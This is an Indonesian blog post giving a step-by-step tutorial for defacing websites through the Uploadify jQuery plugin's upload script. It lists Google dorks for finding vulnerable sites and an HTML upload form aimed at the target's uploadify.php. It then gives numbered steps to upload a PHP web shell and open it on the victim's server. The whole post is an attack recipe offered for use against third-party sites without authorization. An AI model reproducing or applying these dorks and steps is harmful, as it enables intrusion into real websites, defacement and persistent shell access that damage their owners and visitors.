Deface metode uploadify + Up shell
Haiiii watashii smuanya!?!
Masih bersama saia,,, vvibu tamvan idaman:'v
Lamer sampah yang ingin berbagi ilmuuuu...
Kali ini watashi balik lagi dengan tutorial deface metode uploadify
Ok watashi sbenarnya tidak tahu bnyak tentang poc ini:"v
Udah prnah make blm?!? Ya tentu sudah
Sering ga?!? gak:'v,,,,,, Justru hanya sekali:'v
Metode ini sbenernya metode lama sihhh,,
Tapi masih bnyak kok yang verawann:'v
Langsung aja ya
============================================
Dork
============================================
- inurl:/uploadify
- inurl:/uploadify intitle:"index of"
- inurl:/uploadify/uploads/
- inurl:/uploadify/example/
- inurl:/uploadify/ ext:swf
- inurl:/uploadify/ ext:pdf
- inurl:/jquery.uploadify
- inurl:/jquery.uploadify ext:swf
- inurl:/jquery.uploadify-v2
- inurl:/uploadify intext:"uploadify.php" intitle:"index of"
- inurl:/uploadify site:uk
- inurl:/uploadify index of
- inurl:/uploadify intext:".jpg"
(kembangin lagi)
=============================================
Shell, Script deface
=============================================
=============================================
Jaringan, kesabaran:'v
=============================================
Csrf:
<form method="post" action="urltarget">
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Tusbol">
</form>
========================================================================
Tutorial 2:
- Harap masukan exploit: /uploadify/uploadify.php atau /[path]/uploadify/uploadify.php
- Vulnrebilyty nya sama yakni akan tampak kosong:v
- Csrf onlen nya di Sini
Langsung aja
1. dorking pakai dork diatas.
2. pilih target yang menurutmu vuln.
3. beri exploit pada domain website, contoh: site.com/[path]/uploadify/uploadify.php
4. jika blank putih = vuln ( bisa di eksekusi)
5. buka csrf online.
6. isi url dan post data, post data isi: Filedata
7. kunci target, upload shell.
8. kalo muncul angka 1 artinya sukses, jika blank gak sukses
9. cara akses? site.co.li/namashell.php
10. jika sudah terserah mau ngapain.
====================================================================
Sbenarnya tidak beda jauh kan?!?
Jadi yang pernah di pake tutorial yang mana?!?
Yang pertama dund,,,, Yang kedua new tutorial [source: https://www.khoirulrisqi.com]
Mungkin itu dulu yakkk!!!
Jangan lupa kunjungi share dan ikuti teruss yaa sobbb!!!
Salam lamer karatan
vvibu noleph:v
Satu karna nasib
Komentar
Posting Komentar